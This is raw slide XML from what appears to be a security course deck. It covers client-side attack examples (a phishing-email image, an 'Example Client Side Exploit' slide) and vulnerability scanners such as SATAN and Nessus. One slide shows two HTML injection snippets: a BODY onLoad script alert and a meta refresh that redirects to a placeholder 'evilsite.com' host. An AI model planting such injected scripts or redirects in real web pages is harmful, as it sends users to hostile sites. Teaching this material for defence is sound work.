              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Body onLoad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY onLoad="alert('hello world!')"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Meta Refresh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;meta http-equiv="refresh" content=" http://evilsite.com"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{52E963AA-DD94-4868-B251-D932CDD1B2ED}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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Client Side Attacks (Examples)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48132" name="Content Placeholder 4" descr="fakepaypal-email.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1930400" y="2514600"/>
            <a:ext cx="8756650" cy="6400800"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="1066800"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Client Side Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3C5A3214-40F4-4EC9-A370-C70BDE067AA8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1473200" y="2362200"/>
            <a:ext cx="10215563" cy="6073775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168400" y="4572000"/>
            <a:ext cx="11053763" cy="1936750"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="0" cap="none">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TOOLS AND ATTACK IMPLEMENTATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4194666-93C7-491D-8595-CEB4B32DFA7D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1B29EE7C-3E0A-4095-B633-BA7AD21E5F1D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227"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2228" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="79692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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="571500" y="1968500"/>
            <a:ext cx="12026900" cy="7175500"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Assessment  is a software bug or mis-configuration which can allow for unauthorized access to network resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Original vulnerability scanner was called SATAN (Security Admin Tool for Analyzing Networks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Written by Dan Farmer in 1995 employed by SGI at the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Very controversial when released.   Eventually resulted in SGI firing Dan Farmer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Currently there are many commercial scanners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ISS Internet Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SAINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Retina by eEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Nessus by Tenable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Gill Sans" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDF1F2DF-354C-4739-9BC4-D34AE2482631}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251"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3252" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="1219200"/>
            <a:ext cx="11703050" cy="79692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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="571500" y="1968500"/>
            <a:ext cx="12026900" cy="7175500"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus project started by Renaud Deraison in 1998.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Very popular vulnerability scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Oct 2005 founded Tenable security and changed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>closed source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Still free but with limited signature set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OPEN-VAS is a fork of the original Nessus code and is still open source. (http://www.openvas.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Gill Sans" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Courier" charset="0"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
